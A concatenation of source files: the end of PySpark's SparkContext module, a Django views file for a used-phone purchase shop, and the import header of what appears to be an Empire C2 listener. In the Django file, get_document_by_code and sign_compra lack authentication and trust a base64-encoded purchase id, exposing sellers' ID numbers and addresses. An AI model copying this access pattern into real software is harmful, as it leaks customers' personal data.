:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def _checkpointFile(self, name, input_deserializer):
jrdd = self._jsc.checkpointFile(name)
return RDD(jrdd, self, input_deserializer)
def union(self, rdds):
"""
Build the union of a list of RDDs.
This supports unions() of RDDs with different serialized formats,
although this forces them to be reserialized using the default
serializer:
>>> path = os.path.join(tempdir, "union-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
['Hello']
>>> parallelized = sc.parallelize(["World!"])
>>> sorted(sc.union([textFile, parallelized]).collect())
['Hello', 'World!']
"""
first_jrdd_deserializer = rdds[0]._jrdd_deserializer
if any(x._jrdd_deserializer != first_jrdd_deserializer for x in rdds):
rdds = [x._reserialize() for x in rdds]
gw = SparkContext._gateway
jvm = SparkContext._jvm
jrdd_cls = jvm.org.apache.spark.api.java.JavaRDD
jpair_rdd_cls = jvm.org.apache.spark.api.java.JavaPairRDD
jdouble_rdd_cls = jvm.org.apache.spark.api.java.JavaDoubleRDD
if is_instance_of(gw, rdds[0]._jrdd, jrdd_cls):
cls = jrdd_cls
elif is_instance_of(gw, rdds[0]._jrdd, jpair_rdd_cls):
cls = jpair_rdd_cls
elif is_instance_of(gw, rdds[0]._jrdd, jdouble_rdd_cls):
cls = jdouble_rdd_cls
else:
cls_name = rdds[0]._jrdd.getClass().getCanonicalName()
raise TypeError("Unsupported Java RDD class %s" % cls_name)
jrdds = gw.new_array(cls, len(rdds))
for i in range(0, len(rdds)):
jrdds[i] = rdds[i]._jrdd
return RDD(self._jsc.union(jrdds), self, rdds[0]._jrdd_deserializer)
def broadcast(self, value):
"""
Broadcast a read-only variable to the cluster, returning a :class:`Broadcast`
object for reading it in distributed functions. The variable will
be sent to each cluster only once.
"""
return Broadcast(self, value, self._pickled_broadcast_vars)
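# Illustrative usage (not from the original file): a broadcast variable is shipped to
# executors once and read via .value inside tasks.
#
#   >>> lookup = sc.broadcast({"a": 1, "b": 2})
#   >>> sc.parallelize(["a", "b", "a"]).map(lambda k: lookup.value[k]).collect()
#   [1, 2, 1]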
def accumulator(self, value, accum_param=None):
"""
Create an :class:`Accumulator` with the given initial value, using a given
:class:`AccumulatorParam` helper object to define how to add values of the
data type if provided. Default AccumulatorParams are used for integers
and floating-point numbers if you do not provide one. For other types,
a custom AccumulatorParam can be used.
"""
if accum_param is None:
if isinstance(value, int):
accum_param = accumulators.INT_ACCUMULATOR_PARAM
elif isinstance(value, float):
accum_param = accumulators.FLOAT_ACCUMULATOR_PARAM
elif isinstance(value, complex):
accum_param = accumulators.COMPLEX_ACCUMULATOR_PARAM
else:
raise TypeError("No default accumulator param for type %s" % type(value))
SparkContext._next_accum_id += 1
return Accumulator(SparkContext._next_accum_id - 1, value, accum_param)
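# Illustrative usage (not from the original file): tasks may only add to an accumulator;
# the driver reads the aggregated result via .value.
#
#   >>> acc = sc.accumulator(0)
#   >>> sc.parallelize([1, 2, 3, 4]).foreach(lambda x: acc.add(x))
#   >>> acc.value
#   10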
def addFile(self, path, recursive=False):
"""
Add a file to be downloaded with this Spark job on every node.
The `path` passed can be either a local file, a file in HDFS
(or other Hadoop-supported filesystems), or an HTTP, HTTPS or
FTP URI.
To access the file in Spark jobs, use :meth:`SparkFiles.get` with the
filename to find its download location.
A directory can be given if the recursive option is set to True.
Currently directories are only supported for Hadoop-supported filesystems.
.. note:: A path can be added only once. Subsequent additions of the same path are ignored.
>>> from pyspark import SparkFiles
>>> path = os.path.join(tempdir, "test.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("100")
>>> sc.addFile(path)
>>> def func(iterator):
... with open(SparkFiles.get("test.txt")) as testFile:
... fileVal = int(testFile.readline())
... return [x * fileVal for x in iterator]
>>> sc.parallelize([1, 2, 3, 4]).mapPartitions(func).collect()
[100, 200, 300, 400]
"""
self._jsc.sc().addFile(path, recursive)
def addPyFile(self, path):
"""
Add a .py or .zip dependency for all tasks to be executed on this
SparkContext in the future. The `path` passed can be either a local
file, a file in HDFS (or other Hadoop-supported filesystems), or an
HTTP, HTTPS or FTP URI.
.. note:: A path can be added only once. Subsequent additions of the same path are ignored.
"""
self.addFile(path)
(dirname, filename) = os.path.split(path) # dirname may be directory or HDFS/S3 prefix
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
# for tests in local mode
sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))
importlib.invalidate_caches()
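# Illustrative usage (the path and module name are hypothetical): once a .py file has
# been added, it can be imported inside tasks running on executors.
#
#   >>> sc.addPyFile("/tmp/mylib.py")  # doctest: +SKIP
#   >>> sc.parallelize([1]).map(lambda _: __import__("mylib").__name__).collect()  # doctest: +SKIP
#   ['mylib']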
def setCheckpointDir(self, dirName):
"""
Set the directory under which RDDs are going to be checkpointed. The
directory must be an HDFS path if running on a cluster.
"""
self._jsc.sc().setCheckpointDir(dirName)
def _getJavaStorageLevel(self, storageLevel):
"""
Returns a Java StorageLevel based on a pyspark.StorageLevel.
"""
if not isinstance(storageLevel, StorageLevel):
raise Exception("storageLevel must be of type pyspark.StorageLevel")
newStorageLevel = self._jvm.org.apache.spark.storage.StorageLevel
return newStorageLevel(storageLevel.useDisk,
storageLevel.useMemory,
storageLevel.useOffHeap,
storageLevel.deserialized,
storageLevel.replication)
def setJobGroup(self, groupId, description, interruptOnCancel=False):
"""
Assigns a group ID to all the jobs started by this thread until the group ID is set to a
different value or cleared.
Often, a unit of execution in an application consists of multiple Spark actions or jobs.
Application programmers can use this method to group all those jobs together and give a
group description. Once set, the Spark web UI will associate such jobs with this group.
The application can use :meth:`SparkContext.cancelJobGroup` to cancel all
running jobs in this group.
>>> import threading
>>> from time import sleep
>>> result = "Not Set"
>>> lock = threading.Lock()
>>> def map_func(x):
... sleep(100)
... raise Exception("Task should have been cancelled")
>>> def start_job(x):
... global result
... try:
... sc.setJobGroup("job_to_cancel", "some description")
... result = sc.parallelize(range(x)).map(map_func).collect()
... except Exception as e:
... result = "Cancelled"
... lock.release()
>>> def stop_job():
... sleep(5)
... sc.cancelJobGroup("job_to_cancel")
>>> suppress = lock.acquire()
>>> suppress = threading.Thread(target=start_job, args=(10,)).start()
>>> suppress = threading.Thread(target=stop_job).start()
>>> suppress = lock.acquire()
>>> print(result)
Cancelled
If interruptOnCancel is set to true for the job group, then job cancellation will result
in Thread.interrupt() being called on the job's executor threads. This is useful to help
ensure that the tasks are actually stopped in a timely manner, but is off by default due
to HDFS-1208, where HDFS may respond to Thread.interrupt() by marking nodes as dead.
.. note:: Currently, setting a group ID (set to local properties) with multiple threads
does not properly work. Internally threads on PVM and JVM are not synced, and JVM
thread can be reused for multiple threads on PVM, which fails to isolate local
properties for each thread on PVM.
To avoid this, enable the pinned thread mode by setting the ``PYSPARK_PIN_THREAD``
environment variable to ``true`` and use :class:`pyspark.InheritableThread`.
"""
self._jsc.setJobGroup(groupId, description, interruptOnCancel)
def setLocalProperty(self, key, value):
"""
Set a local property that affects jobs submitted from this thread, such as the
Spark fair scheduler pool.
.. note:: Currently, setting a local property with multiple threads does not properly work.
Internally threads on PVM and JVM are not synced, and JVM thread
can be reused for multiple threads on PVM, which fails to isolate local properties
for each thread on PVM.
To avoid this, enable the pinned thread mode by setting the ``PYSPARK_PIN_THREAD``
environment variable to ``true`` and use :class:`pyspark.InheritableThread`.
"""
self._jsc.setLocalProperty(key, value)
def getLocalProperty(self, key):
"""
Get a local property set in this thread, or null if it is missing. See
:meth:`setLocalProperty`.
"""
return self._jsc.getLocalProperty(key)
def setJobDescription(self, value):
"""
Set a human-readable description of the current job.
.. note:: Currently, setting a job description (set to local properties) with multiple
threads does not properly work. Internally threads on PVM and JVM are not synced,
and JVM thread can be reused for multiple threads on PVM, which fails to isolate
local properties for each thread on PVM.
To avoid this, enable the pinned thread mode by setting the ``PYSPARK_PIN_THREAD``
environment variable to ``true`` and use :class:`pyspark.InheritableThread`.
"""
self._jsc.setJobDescription(value)
def sparkUser(self):
"""
Get SPARK_USER for the user who is running SparkContext.
"""
return self._jsc.sc().sparkUser()
def cancelJobGroup(self, groupId):
"""
Cancel active jobs for the specified group. See :meth:`SparkContext.setJobGroup`
for more information.
"""
self._jsc.sc().cancelJobGroup(groupId)
def cancelAllJobs(self):
"""
Cancel all jobs that have been scheduled or are running.
"""
self._jsc.sc().cancelAllJobs()
def statusTracker(self):
"""
Return :class:`StatusTracker` object
"""
return StatusTracker(self._jsc.statusTracker())
def runJob(self, rdd, partitionFunc, partitions=None, allowLocal=False):
"""
Executes the given partitionFunc on the specified set of partitions,
returning the result as an array of elements.
If 'partitions' is not specified, this will run over all partitions.
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part])
[0, 1, 4, 9, 16, 25]
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part], [0, 2], True)
[0, 1, 16, 25]
"""
if partitions is None:
partitions = range(rdd._jrdd.partitions().size())
# Implementation note: This is implemented as a mapPartitions followed
# by runJob() in order to avoid having to pass a Python lambda into
# SparkContext#runJob.
mappedRDD = rdd.mapPartitions(partitionFunc)
sock_info = self._jvm.PythonRDD.runJob(self._jsc.sc(), mappedRDD._jrdd, partitions)
return list(_load_from_socket(sock_info, mappedRDD._jrdd_deserializer))
def show_profiles(self):
""" Print the profile stats to stdout """
if self.profiler_collector is not None:
self.profiler_collector.show_profiles()
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def dump_profiles(self, path):
""" Dump the profile stats into directory `path`
"""
if self.profiler_collector is not None:
self.profiler_collector.dump_profiles(path)
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def getConf(self):
conf = SparkConf()
conf.setAll(self._conf.getAll())
return conf
@property
def resources(self):
resources = {}
jresources = self._jsc.resources()
for x in jresources:
name = jresources[x].name()
jaddresses = jresources[x].addresses()
addrs = [addr for addr in jaddresses]
resources[name] = ResourceInformation(name, addrs)
return resources
@staticmethod
def _assert_on_driver():
"""
Called to ensure that SparkContext is created only on the Driver.
Throws an exception if a SparkContext is about to be created in executors.
"""
if TaskContext.get() is not None:
raise Exception("SparkContext should only be created and accessed on the driver.")
def _test():
import atexit
import doctest
import tempfile
globs = globals().copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest')
globs['tempdir'] = tempfile.mkdtemp()
atexit.register(lambda: shutil.rmtree(globs['tempdir']))
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
compras.py
|
# -*- coding: utf-8 -*-
# @Author: Manuel Rodriguez <valle>
# @Date: 28-Aug-2017
# @Email: valle.mrv@gmail.com
# @Filename: views.py
# @Last modified by: valle
# @Last modified time: 02-Mar-2018
# @License: Apache license version 2.0
from django.forms.models import model_to_dict
from django.db.models import Q
from django.conf import settings
from django.shortcuts import render, redirect
try:
from django.core.urlresolvers import reverse
except ImportError:
from django.urls import reverse
from django.contrib.auth.decorators import login_required, permission_required
from django.template.loader import render_to_string
from django.http import HttpResponse
#from django.template import Context
from django.template.loader import get_template
from adminshop.utility import get_documento_compra, get_documento_testeo
from adminshop.forms import (CPClientesForm, CPProductosForm, ProductosForm, MODProductosForm,
FinTratoForm, ValidarCompra, VistaValidarForm, ModelosForm)
from adminshop.models import (Modelos, Clientes, Testeo, ConfigSite, Historial, Firmas,
Productos, Compras, Tipos, Direcciones, DocumentoTesteo, ListaTesteo)
from adminshop.utility import save_historial, save_doc_firmas, save_doc_testeo
from . import (validoDNI, get_first_direccion, set_first_direccion)
from tokenapi.http import JsonResponse
import threading
import base64
import json
import trml2pdf
import os
@login_required(login_url='login_tk')
def get_modificar_compra(request, id_compra):
pres = Compras.objects.filter(pk=id_compra)
if len(pres) > 0:
pres = pres[0]
vendedor = pres.get_vendedor()
producto = pres.producto
producto_dict = model_to_dict(producto)
producto_dict["cliente"] = vendedor['id']
f_compra = MODProductosForm(producto_dict)
modelo = producto.modelo
return render (request, "tienda/compras/modificar.html",
{"c": vendedor,
"form": f_compra,
"m": modelo,
"f": pres})
return redirect("tienda")
@login_required(login_url='login_tk')
def modificar_compra(request, id_compra):
if request.method == "POST":
pres = Compras.objects.filter(pk=id_compra)
if len(pres) > 0:
pres = pres[0]
producto = pres.producto
producto.tipo_id = request.POST["tipo"]
producto.color = request.POST["color"]
producto.modelo_id = request.POST["modelo"]
producto.ns_imei = request.POST["ns_imei"]
producto.precio_compra = request.POST["precio_compra"]
producto.save()
pres.vendedor_id = request.POST["cliente"]
pres.save()
return HttpResponse(reverse("listado_compras"))
@login_required(login_url='login_tk')
def ch_find_modelo(request):
if request.method == "POST":
filter = request.POST["filter"]
filter_query = Modelos.objects.filter(Q(nombre__contains=filter) |
Q(marca__nombre__contains=filter))
return render(request, "tienda/compras/lista_modelos.html",
{'query': filter_query,
'change': True })
@login_required(login_url='login_tk')
def cancelar_trato(request, id_producto):
if request.method == "POST":
producto = Productos.objects.get(pk=id_producto)
f_p = FinTratoForm(request.POST, instance=producto)
if f_p.is_valid():
p = f_p.save()
p.estado = "CT"
p.save()
clientes = Historial.objects.filter(producto_id=p.pk)
cliente_id = 1
if len(clientes) > 0:
cliente_id = clientes[0].cliente_id
# record the action in the history log
save_historial(request.user.id, p.id, cliente_id,
"Rechazada la compra del producto..")
vaciar_sesison_compra(request)
return HttpResponse(reverse("tienda"))
else:
p = Productos.objects.get(pk=id_producto)
p.estado = "CT"
p.save()
clientes = Historial.objects.filter(producto_id=p.pk)
cliente_id = 1
if len(clientes) > 0:
cliente_id = clientes[0].cliente_id
# record the action in the history log
save_historial(request.user.id, p.id, cliente_id,
"Rechazada la compra del producto..")
vaciar_sesison_compra(request)
return redirect("lista_productos", estado="TD")
@login_required(login_url='login_tk')
def validar_compra(request, id_compra):
if request.method == "POST":
compra = Compras.objects.get(pk=id_compra)
f = ValidarCompra(request.POST, instance=compra)
if f.is_valid():
compra = f.save()
vaciar_sesison_compra(request)
# queue the document to be signed
save_doc_firmas(request.user.pk, compra.pk, "CP")
return redirect("tienda")
else:
f = VistaValidarForm(instance=compra)
return render(request, "tienda/compras/validar_compra.html",
{"form": f, "form_error": f.errors })
else:
compra = Compras.objects.get(pk=id_compra)
f = VistaValidarForm(instance=compra)
return render(request, "tienda/compras/validar_compra.html",
{"form": f, })
@login_required(login_url='login_tk')
def send_sign(request, id_producto):
producto = Productos.objects.get(pk=id_producto)
compras = Compras.objects.filter(producto__id=id_producto)
if len(compras) > 0:
compra = compras[0]
Firmas.objects.filter(Q(documento_id=compra.pk) &
Q(tipo_documento="CP")).delete()
threading.Thread(target=send_men_sing, args=(compra,)).start()
return render(request, "tienda/compras/sender_sign.html")
@login_required(login_url='login_tk')
def get_document_by_id(request, id_producto):
producto = Productos.objects.get(pk=id_producto)
compras = Compras.objects.filter(producto__id=id_producto)
compra = Compras()
if len(compras) > 0:
compra = compras[0]
return get_document(producto, compra)
@login_required(login_url='login_tk')
def find_cliente(request):
vaciar_sesison_compra(request)
if request.method == "POST" and "DNI" in request.POST:
if validoDNI(request.POST["DNI"]):
return cp_clientes(request)
else:
return render(request, 'tienda/compras/find_cliente.html',{
"mensaje": "DNI no valido",
"url_tipo": reverse("find_cliente")
})
return render(request, 'tienda/compras/find_cliente.html',{
"url_tipo": reverse("find_cliente")
})
@login_required(login_url='login_tk')
def listado_doc_testeos(request):
testeos = DocumentoTesteo.objects.all()
return render(request, 'tienda/testeo/listado.html',{
"compras": testeos
})
@login_required(login_url='login_tk')
def find_doc_testeos(request):
filter = request.POST["filter"]
if len(filter) > 0 and filter[0].upper() == "T":
filter = filter.replace("T", "")
filter = filter.replace("t", "")
compras = DocumentoTesteo.objects.filter(Q(pk=filter))
else:
compras = DocumentoTesteo.objects.filter(Q(cliente__DNI__contains=filter)|
Q(cliente__nombre_completo__contains=filter))
return render(request, 'tienda/testeo/listado_ajax.html',{
"compras": compras
})
@login_required(login_url='login_tk')
def get_doc_testeo_by_id(request, id_doc):
doc = DocumentoTesteo.objects.get(pk=id_doc)
return doc_testeo(doc)
@login_required(login_url='login_tk')
def cp_clientes(request):
if request.method == 'POST':
if "filter" in request.POST:
clientes = Clientes.objects.filter(DNI__icontains=request.POST.get('DNI'))
if len(clientes) > 0:
direccion = get_first_direccion(clientes[0].id)
full_data = dict(list(model_to_dict(direccion).items()) + list(model_to_dict(clientes[0]).items()))  # list() keeps this working on Python 3
form = CPClientesForm (full_data, instance=clientes[0])
titulo = 'Cliente existente'
tipo = "comprar"
request.session["accion_comprar_dni"] = request.POST.get('DNI')
request.session["accion_comprar_pk_cliente"] = clientes[0].pk
else:
form = CPClientesForm(request.POST)
titulo = 'Cliente no existe'
tipo = "no_existe"
return render(request, 'tienda/compras/clientes_ajax.html',
{'form':form, 'titulo': titulo,
'tipo': tipo})
elif len(request.POST) == 2 and "DNI" in request.POST:
clientes = Clientes.objects.filter(DNI__icontains=request.POST.get('DNI'))
if len(clientes) > 0:
direccion = get_first_direccion(clientes[0].id)
full_data = dict(list(model_to_dict(direccion).items()) + list(model_to_dict(clientes[0]).items()))  # list() keeps this working on Python 3
form = CPClientesForm (full_data, instance=clientes[0])
titulo = 'Cliente existente'
tipo = "comprar"
request.session["accion_comprar_dni"] = request.POST.get('DNI')
request.session["accion_comprar_pk_cliente"] = clientes[0].pk
else:
form = CPClientesForm(request.POST)
titulo = 'Cliente no existe'
tipo = "no_existe"
return render(request, 'tienda/compras/clientes.html',
{'form':form, 'titulo': titulo,
'tipo': tipo})
elif len(request.POST) > 2:
tipo = "comprar"
clientes = Clientes.objects.filter(DNI__icontains=request.POST.get('DNI'))
request.session["accion_comprar_dni"] = request.POST.get('DNI')
if len(clientes) > 0:
form = CPClientesForm(request.POST, instance=clientes[0])
else:
form = CPClientesForm(request.POST)
if form.is_valid():
cliente = form.save()
direccion = set_first_direccion(request.POST, cliente.pk)
if type(direccion) == Direcciones:
direccion.cliente_id = cliente.pk
direccion.save()
else:
return render(request, 'tienda/compras/clientes.html',
{'form':form, 'titulo': "Error al guardar el cliente",
'tipo': tipo, "form_error": form.errors})
request.session["accion_comprar_pk_cliente"] = cliente.pk
return render(request, 'tienda/compras/clientes.html',
{'form':form, 'titulo': "Cliente guardado o modificado",
'tipo': tipo})
return redirect("find_cliente")
@login_required(login_url='login_tk')
def listado_compras(request):
compras = Compras.objects.all().exclude(tipo_vendedor="NO")
return render(request, 'tienda/compras/listado.html',{
"compras": compras
})
@login_required(login_url='login_tk')
def find_compra(request):
filter = request.POST["filter"]
if len(filter) > 0 and "c" == filter[0].lower():
filter = filter.replace("C", "")
filter = filter.replace("c", "")
compras = Compras.objects.filter(Q(codigo_compra__icontains=filter)).exclude(vendedor_id=None)
else:
compras = Compras.objects.filter(Q(codigo_compra__icontains=filter)|
Q(producto__ns_imei__icontains=filter)).exclude(vendedor_id=None)
return render(request, 'tienda/compras/listado_ajax.html',{
"compras": compras
})
@login_required(login_url='login_tk')
def cp_lista_modelos(request):
if request.method == "POST":
filter = request.POST["filter"]
filter_query = Modelos.objects.filter(Q(nombre__icontains=filter))
return render(request, "tienda/compras/lista_modelos.html", {'query': filter_query})
@login_required(login_url='login_tk')
def send_para_tester(request, id_modelo):
if "accion_comprar_dni" in request.session:
try:
producto = Productos.objects.get(ns_imei=request.POST.get("ns_imei"))
form = CPProductosForm(request.POST, instance=producto)
except Exception as p:
form = CPProductosForm(request.POST)
if form.is_valid():
producto = form.save(commit=False)
producto.modelo_id = request.session["accion_comprar_pk_modelo"]
producto.estado = "OS"
producto.tipo_id = 1
producto.precio_compra = producto.modelo.precio_usado
producto.save()
request.session["accion_comprar_pk_producto"] = producto.pk
# Save the history record for the action performed
save_historial(request.user.pk, request.session["accion_comprar_pk_cliente"],
producto.pk, "Entrada para testeo posible compra")
# Create the device reception document.
doc = save_doc_testeo(request.user.pk, request.session["accion_comprar_pk_cliente"],
producto.pk)
# Save the document to be signed
save_doc_firmas(request.user.pk, doc.id, "OS")
vaciar_sesison_compra(request)
return JsonResponse({"result": True})
else:
return redirect("tienda")
@login_required(login_url='login_tk')
def cp_productos(request, id_modelo=-1):
if "accion_comprar_dni" in request.session:
if request.method != "POST" and id_modelo < 0:
f_modelo = ModelosForm()
return render(request, 'tienda/compras/find_modelos.html',
{"form": f_modelo})
elif request.method != "POST" and id_modelo > 0:
request.session["accion_comprar_pk_modelo"] = id_modelo
try:
modelo = Modelos.objects.get(pk=id_modelo)
except:
modelo = Modelos()
tipo = "no_existe"
form = CPProductosForm()
return render(request, 'tienda/compras/productos.html',
{'form':form, 'titulo': "Datos del producto",
'modelo': modelo,
'tipo': tipo})
else:
try:
producto = Productos.objects.get(ns_imei=request.POST.get("ns_imei"))
form = CPProductosForm(request.POST, instance=producto)
except Exception as p:
form = CPProductosForm(request.POST)
if form.is_valid():
producto = form.save(commit=False)
if "accion_comprar_pk_modelo" not in request.session:
vaciar_sesison_compra(request)
return redirect("tienda")
producto.modelo_id = request.session["accion_comprar_pk_modelo"]
producto.estado = "TD"
#tipos = Tipos.objects.all()
#if len(tipos) > 0:
# tipo = tipos[0].pk
#else:
# tipo = -1
#producto.tipo_id = tipo
producto.precio_compra = producto.modelo.precio_usado
producto.save()
request.session["accion_comprar_pk_producto"] = producto.pk
save_historial(request.user.pk, request.session["accion_comprar_pk_cliente"],
request.session["accion_comprar_pk_producto"],
"Producto comprado sin testear")
form = ProductosForm(instance=producto)
return render(request, 'tienda/compras/compras.html',
{'form':form, 'titulo': "Datos del producto",
"form_error": form.errors,
"id_modelo": request.session["accion_comprar_pk_modelo"]})
else:
return redirect("tienda")
@login_required(login_url='login_tk')
def calcular_precio_usado(request, id_modelo):
if request.method == "POST":
tipo = Tipos.objects.get(pk=request.POST["tipo"])
modelo = Modelos.objects.get(pk=id_modelo)
return HttpResponse("{0:.2f}".format(float(tipo.incremento)*float(modelo.precio_usado)))
else:
return redirect("tienda")
@login_required(login_url='login_tk')
def hacer_compra(request):
if request.method == "POST":
try:
producto = Productos.objects.get(pk=request.session["accion_comprar_pk_producto"])
producto.tipo_id = request.POST["tipo"]
producto.precio_compra = request.POST["precio_compra"]
producto.estado = "ST"
producto.save()
except Exception as error:
return HttpResponse(reverse("en_construccion"))
estan_todos = True
estan_todos = estan_todos and "accion_comprar_pk_cliente" in request.session
estan_todos = estan_todos and "accion_comprar_pk_producto" in request.session
estan_todos = estan_todos and "accion_comprar_pk_modelo" in request.session
if estan_todos:
compra = guardar_compra(request.session["accion_comprar_pk_cliente"],
request.session["accion_comprar_pk_producto"],
request.user.id,
"Realizada la compra del producto")
return HttpResponse(reverse("validar_compra", args=[str(compra.id)]))
else:
return HttpResponse(reverse("tienda"))
@login_required(login_url='login_tk')
def trato_compra(request, id_producto):
if request.method == "POST":
producto = Productos.objects.get(pk=id_producto)
f_p = FinTratoForm(request.POST, instance=producto)
if f_p.is_valid():
p = f_p.save()
p.estado = "ST"
p.save()
clientes = Historial.objects.filter(producto_id=p.pk)
cliente_id = 1
if len(clientes) > 0:
cliente_id = clientes[0].cliente_id
compra = guardar_compra(cliente_id, p.id, request.user.id,
"Realizada la compra del producto. Despues de testear")
return HttpResponse(reverse("validar_compra", args=[compra.id]))
else:
producto = Productos.objects.get(pk=id_producto)
if producto.tipo is None:
producto.tipo = Tipos.objects.all()[0]
producto.precio_compra = "{0:.2f}".format(producto.modelo.precio_usado *
producto.tipo.incremento)
producto.save()
filter_query = Testeo.objects.filter(producto_id=id_producto)
lista_ids = filter_query.values_list("descripcion_id", flat=True)
no_realizados = ListaTesteo.objects.filter(categoria=producto.modelo.categoria)
return render(request, "tienda/compras/trato_compra.html",
{'query': filter_query.exclude(estado="OK"), "p": producto,
"no_realizados": no_realizados.exclude(pk__in=lista_ids),
"form": FinTratoForm(instance=producto)})
@login_required(login_url='login_tk')
def cancelar_compra(request):
if request.method == "POST":
try:
producto = Productos.objects.get(pk=request.session["accion_comprar_pk_producto"])
producto.tipo_id = request.POST["tipo"]
producto.precio_compra = request.POST["precio_compra"]
producto.estado = "CT"
producto.save()
except:
return HttpResponse(reverse("tienda"))
estan_todos = True
estan_todos = estan_todos and "accion_comprar_pk_cliente" in request.session
estan_todos = estan_todos and "accion_comprar_pk_producto" in request.session
estan_todos = estan_todos and "accion_comprar_pk_modelo" in request.session
if estan_todos:
# Save a history record for the purchase cancellation
save_historial(request.user.id, request.session["accion_comprar_pk_cliente"],
request.session["accion_comprar_pk_producto"],
"Compra cancelada, producto en posesion del cliente")
vaciar_sesison_compra(request)
return HttpResponse(reverse("tienda"))
else:
return HttpResponse(reverse("en_construccion"))
@login_required(login_url='login_tk')
def salir_compra(request):
try:
producto = Productos.objects.get(pk=request.session["accion_comprar_pk_producto"])
producto.estado = "CT"
producto.save()
except:
pass
vaciar_sesison_compra(request)
return redirect("tienda")
def guardar_compra(cliente_id, producto_id, user_id, detalle):
compra = Compras()
compra.vendedor_id = cliente_id
compra.tipo_vendedor = 'CL'
compra.producto_id = producto_id
compra.usuario_id = user_id
compra.save()
# Save the history record
save_historial(user_id, cliente_id, producto_id, detalle)
return compra
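# vaciar_sesison_compra removes every purchase-related key from the session once the
# purchase flow ends or is aborted.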
def vaciar_sesison_compra(request):
if "accion_comprar_pk_cliente" in request.session:
del request.session["accion_comprar_pk_cliente"]
if "accion_comprar_pk_producto" in request.session:
del request.session["accion_comprar_pk_producto"]
if "accion_comprar_pk_modelo" in request.session:
del request.session["accion_comprar_pk_modelo"]
if "accion_comprar_dni" in request.session:
del request.session["accion_comprar_dni"]
def get_document_by_code(request, code):
datos = json.loads(base64.b64decode(code))
compras = Compras.objects.filter(pk=datos["id_compra"])
compra = Compras()
if len(compras) > 0:
compra = compras[0]
producto = Productos.objects.get(pk=compra.producto.pk)
return get_document(producto, compra)
return redirect('https://google.es')
def get_document(producto, compra):
response = HttpResponse(content_type='application/pdf')
response['Content-Disposition'] = 'inline; filename="%s.pdf"' % producto.modelo
doc_compra = get_documento_compra(producto, compra)
response.write(doc_compra.getvalue())
return response
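# send_men_sing e-mails the seller a link to the signing page; the link embeds a
# base64-encoded JSON payload with the purchase id, purchase code and e-mail address.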
def send_men_sing(compra):
vendedor = compra.get_vendedor()
datos = {
"id_compra": compra.id,
"codigo_compra": str(compra.codigo_compra),
"email": vendedor['email'],
}
send_data = base64.b64encode(json.dumps(datos))
url = settings.BASE_URL + reverse("sign_compra", args=[send_data])
from django.core.mail import send_mail
from django.template.loader import render_to_string
msg_plain = render_to_string(settings.BASE_DIR+'/templates/email/url_sign.html',
{'nombre': vendedor['nombre'],
"url": url})
send_mail(
'Firmar y aceptar condiciones',
msg_plain,
"info@freakmedia.es",
[datos['email']],
)
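# sign_compra resolves the code from the e-mailed link: if the purchase has not been
# signed yet it renders the signing page with the seller's data, otherwise it returns
# the already generated purchase document.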
def sign_compra(request, code):
datos = json.loads(base64.b64decode(code))
compras = Compras.objects.filter(pk=datos["id_compra"])
datos_send = None
if len(compras) > 0:
compra = compras[0]
if compra.firma == '':
vendedor = compra.get_vendedor()
datos_send= {
"pk": datos["id_compra"],
"id_producto": compra.producto.pk,
"nombre": vendedor["nombre"],
"telefono": vendedor['telefono'],
"DNI": vendedor["DNI"].upper(),
"domicilio": vendedor['direccion'],
"ns_imei": compra.producto.ns_imei,
"precio_compra": str(compra.producto.precio_compra),
"code": code
}
return render(request, "tienda/compras/sign.html", {"datos":datos_send})
else:
return redirect("get_document_by_code", code=code )
return redirect('tienda')
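# doc_testeo renders the testing document for a product as an inline PDF response.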
def doc_testeo(doc):
tmpl_path = settings.DOCUMENT_TMPL
response = HttpResponse(content_type='application/pdf')
response['Content-Disposition'] = 'inline; filename="testeo_%s.pdf"' % doc.producto
pdfstr = get_documento_testeo(doc)
response.write(pdfstr.getvalue())
return response
|
http_mapi.py
|
import logging
import base64
import random
import os
import ssl
import time
import copy
from pydispatch import dispatcher
from flask import Flask, request, make_response
# Empire imports
